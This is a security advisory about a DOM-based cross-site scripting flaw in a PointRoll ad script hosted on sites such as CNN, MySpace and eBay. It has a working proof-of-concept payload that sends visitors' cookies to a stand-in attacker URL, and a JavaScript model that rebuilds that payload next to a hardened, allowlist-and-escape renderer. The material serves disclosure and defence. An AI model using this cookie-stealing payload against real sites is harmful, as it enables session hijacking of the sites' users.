A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll.<br>
<br>
The following list is a subset of the websites which contain the vulnerability:<br>
<a class="l" target="_blank" title="http://www.cnn.com/pointroll/PointRollAds.htm" href="http://www.cnn.com/pointroll/PointRollAds.htm">http://www.cnn.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.myspace.com/pointroll/PointRollAds.htm" href="http://www.myspace.com/pointroll/PointRollAds.htm">http://www.myspace.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.friendster.com/pointroll/PointRollAds.htm" href="http://www.friendster.com/pointroll/PointRollAds.htm">http://www.friendster.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://archive.gamespy.com/pointroll/PointRollAds.htm" href="http://archive.gamespy.com/pointroll/PointRollAds.htm">http://archive.gamespy.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.monster.com/pointroll/PointRollAds.htm" href="http://www.monster.com/pointroll/PointRollAds.htm">http://www.monster.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.allmusic.com/pointroll/PointRollAds.htm" href="http://www.allmusic.com/pointroll/PointRollAds.htm">http://www.allmusic.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.pcworld.com/pointroll/PointRollAds.htm" href="http://www.pcworld.com/pointroll/PointRollAds.htm">http://www.pcworld.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.10best.com/pointroll/PointRollAds.htm" href="http://www.10best.com/pointroll/PointRollAds.htm">http://www.10best.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.askmen.com/pointroll/PointRollAds.htm" href="http://www.askmen.com/pointroll/PointRollAds.htm">http://www.askmen.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://pages.ebay.com/pointroll/PointRollAds.html" href="http://pages.ebay.com/pointroll/PointRollAds.html">http://pages.ebay.com/pointroll/PointRollAds.html</a><br>
<br>
The above pages include a script hosted at <a href="http://pointroll.com">pointroll.com</a>, which is the root of
the vulnerability. The script reads its parameters from
location.search and writes them into the page without sanitizing the query, so whoever can get a victim to follow a crafted link runs script in the origin of the hosting site (a DOM-based cross-site scripting flaw). The %27%3E prefix in the proof of concept below, which decodes to '&gt;, closes the single-quoted attribute into which the redir value is written.<br>
<br>
The following is a proof of concept which works in Firefox. Append it to
the end of any of the above URLs. [URL]
should be replaced by a URL you control, such as <a class="l" target="_blank" title="http://www.foo.com/bar.php" href="http://www.foo.com/bar.php">http://www.foo.com/bar.php</a>, and [END] by 5 + the length of that URL + 1 (32 for the example URL). location.search starts with the five characters ?pub=, so the pub parameter only serves to carry your URL at a known offset: substring(5, [END]) yields your URL together with the ? that follows it, document.cookie is appended to that as the query string, and the browser is sent to the result.<br>
<br>
<br>
?pub=[URL]?&amp;redir=%27%3E%3Cscript%3Ewindow.location=location.search.substring(5,[END]).concat(document.cookie)%3C/script%3E&amp;ad=g235e20051011164320
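<br>
The unsafe pattern behind this advisory, modelled as an added example that is not PointRoll's script and not part of the original advisory: a query-string parser, a vulnerable renderer that splices the redir value into a quoted attribute verbatim, and a hardened renderer that validates the redirect target against an allowlist and escapes it before building markup. The parameter names pub, redir and ad come from the proof of concept above; the anchor markup, the allowlisted host ads.example and the sample query string are constructed assumptions. It also carries the substring arithmetic through for the example URL.<br>

```javascript
'use strict';
// Added example (not PointRoll's script): a model of the unsafe pattern the
// advisory describes, with a hardened version beside it. The parameter names
// pub, redir and ad come from the PoC; the anchor markup, the allowlisted host
// ads.example and the sample query string below are constructed assumptions.

// Parse "?k=v&k2=v2" into an object of decoded values, as a simple ad script might.
function parseSearch(search) {
  const params = {};
  const query = search.startsWith('?') ? search.slice(1) : search;
  for (const pair of query.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? '' : pair.slice(eq + 1);
    params[decodeURIComponent(key)] = decodeURIComponent(value.replace(/\+/g, ' '));
  }
  return params;
}

// Vulnerable: the redir value is spliced verbatim into a single-quoted attribute,
// so a value beginning with '> closes the attribute and injects markup.
function renderVulnerable(search) {
  const p = parseSearch(search);
  return "<a href='" + (p.redir || '') + "'>ad</a>";
}

// Escape the five characters that are significant inside HTML text and attributes.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Accept a redirect target only if it parses as an absolute http(s) URL whose
// host is on the allowlist; anything else (javascript:, data:, injected markup,
// relative paths, open redirects to arbitrary hosts) is rejected.
function safeRedirect(raw, allowedHosts) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (!allowedHosts.includes(url.hostname)) return null;
  return url.href;
}

// Hardened: validate first, then escape when building markup. In a real page,
// prefer element.setAttribute('href', target) over string concatenation.
function renderHardened(search, allowedHosts) {
  const p = parseSearch(search);
  const target = safeRedirect(p.redir || '', allowedHosts);
  if (target === null) return '<a>ad</a>';
  return "<a href='" + escapeHtmlAttr(target) + "'>ad</a>";
}

// Constructed sample: the advisory's PoC with [URL] filled in and [END] computed
// as 5 (length of "?pub=") + URL length + 1 (the trailing "?").
const ATTACKER_URL = 'http://www.foo.com/bar.php';
const END = 5 + ATTACKER_URL.length + 1;
const PAYLOAD =
  "'><script>window.location=location.search.substring(5," + END +
  ').concat(document.cookie)</script>';
const SAMPLE_SEARCH =
  '?pub=' + ATTACKER_URL + '?&redir=' + encodeURIComponent(PAYLOAD) +
  '&ad=g235e20051011164320';

// The slice the injected script takes from location.search: the attacker URL
// plus "?", ready to have document.cookie appended as its query string.
function exfilPrefix(search, end) {
  return search.substring(5, end);
}
```

The allowlist check is what closes the redirect half of the problem: escaping alone would stop the attribute breakout but still let redir send visitors to any site. Run under Node, renderVulnerable(SAMPLE_SEARCH) returns markup containing the injected script element, renderHardened returns a bare anchor for the same input, and exfilPrefix(SAMPLE_SEARCH, END) is exactly the attacker URL followed by ?.<br>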